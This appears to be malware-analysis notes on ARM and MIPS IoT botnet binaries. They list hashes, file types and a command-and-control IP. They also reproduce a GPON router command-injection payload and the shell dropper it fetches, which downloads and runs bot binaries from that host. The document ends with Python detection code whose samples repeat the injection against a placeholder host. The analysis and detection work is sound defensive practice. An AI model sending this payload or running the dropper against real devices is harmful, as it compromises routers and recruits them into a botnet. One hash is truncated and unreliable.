Hash List
:~/collected$ sha256sum *
efa4fe06e4949c0f7aedea61a79da92e379ea66b169cd1d99c47b9e93e814093 arm
1ff787d52bc9ec27d75b1a427c3e5dd16d6d5f082a79227c14edf8e908ab2 arm7
bab7e9f42df88902acb00fbdf3b4b5d8ffec2a1a7ad32eb5f2fb1dbf38f3167d mips
a79964ce5cf4b92f996bbc24230e102b94ef05fb072c0afdeabc88d28695cace mipsel
Arch List
:~/collected$ file *
arm: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
arm7: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
mips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
mipsel: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
IP List
:~/collected$ strings * | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"
185.62.190.191
185.62.190.191
185.62.190.191
185.62.190.191
Interesting strings
Probe for vulnerability:
/GponForm/diag_Form?images/
Execute code (check https://www.exploit-db.com/exploits/44576/ for more information):
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
The downloaded resource is r, a bash script:
#!/bin/sh
n="arm mips mipsel arm7"
http_server="185.62.190.191"
#dirs="/tmp /var /dev/shm /dev"
dirs="/tmp"
for dir in $dirs
do
>$dir/c && cd $dir
done
for i in $n
do
cp $SHELL $i
>$i
wget http://$http_server/$i -O -> $i
chmod 777 $i
./$i
done
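
Detection logic for the probe path and the dest_host payload listed under "Interesting strings", as an added example that is not part of the original notes or of the collected samples. It assumes a sensor or honeypot that records each request target together with its form body; the function name, the sample records and the 192.0.2.x addresses are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Path and query marker come from the strings found in the samples above.
PROBE_PATH = "/GponForm/diag_Form"
PROBE_QUERY = "images/"
# Characters a legitimate ping target never contains; they indicate injection.
SHELL_META = re.compile(r"[`;|&$()<>\s]")
# URL the injected command tries to fetch (second-stage location).
URL_RE = re.compile(r"https?://[^/\s;`]+(?:/[^\s;`>]*)?")


def analyze(target, body=""):
    """Classify one request (request target + form body) seen by a sensor."""
    result = {"probe": False, "injection": False, "fetch": []}
    parts = urlsplit(target)
    if parts.path != PROBE_PATH:
        return result
    result["probe"] = parts.query.startswith(PROBE_QUERY)
    # Split the form body by hand so ';' inside a value is never a separator.
    for pair in body.split("&"):
        key, _, raw = pair.partition("=")
        if key != "dest_host":
            continue
        value = unquote_plus(raw)  # '+' -> space, %xx -> byte
        if SHELL_META.search(value):
            result["injection"] = True
            result["fetch"] += URL_RE.findall(value)
    return result


# Constructed sample requests (hypothetical sensor records, TEST-NET address).
SAMPLES = [
    ("/GponForm/diag_Form?images/",
     "XWebPageName=diag&diag_action=ping&wan_conlist=0"
     "&dest_host=``;wget+http://192.0.2.10/r+-O+->/tmp/r;sh+/tmp/r&ipv=0"),
    ("/GponForm/diag_Form?images/",
     "XWebPageName=diag&diag_action=ping&wan_conlist=0"
     "&dest_host=192.0.2.1&ipv=0"),
    ("/index.html", ""),
]

if __name__ == "__main__":
    for target, body in SAMPLES:
        print(target, analyze(target, body))
```

The "fetch" list gives the second-stage URL to block or pivot on; a record with "probe" set but no "injection" is a scan that has not yet delivered a command.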